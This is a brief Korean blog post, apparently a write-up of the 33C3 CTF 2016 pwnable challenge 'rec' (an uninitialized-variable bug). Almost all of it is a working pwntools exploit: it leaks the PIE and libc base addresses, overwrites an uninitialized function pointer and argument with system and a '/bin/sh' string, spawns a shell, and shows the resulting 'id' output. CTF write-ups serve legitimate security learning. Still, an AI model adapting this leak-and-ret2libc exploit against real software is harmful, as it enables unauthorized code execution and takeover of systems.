33C3 CTF - rec

CTF/2016 2018. 12. 14. 18:53

Category : pwnable


Summary : uninitialized variable



Exploit

#!/usr/bin/python

from pwn import *


def cmd_polish_sum(nums):
ru('> ')
sl(str(2))
ru('Operator: ')
sl('S')
for i in range(len(nums)):
ru('Operand: ')
sl(str(nums[i]))
ru('Operand: ')
sl('.')
rl()

def cmd_sign(num):
ru('> ')
sl(str(5))
sl(str(num))

def cmd_read_note():
ru('> ')
sl(str(1))
ru('Your note: ')
note = rl(False)
return note


s = process('./rec')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

leak = cmd_read_note()
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940
print hex(libc_base)

pay = [0 for i in range((0x380 - 0x24 - 8 - 0x44 + 8) / 8)]
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)
cmd_sign(0)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)



'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret